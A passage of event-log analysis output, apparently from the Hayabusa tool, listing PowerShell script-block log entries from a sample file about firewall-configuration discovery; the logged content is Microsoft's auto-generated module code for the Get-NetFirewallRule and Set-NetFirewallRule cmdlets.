'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallRule' function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletizatio",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__c",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"mdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 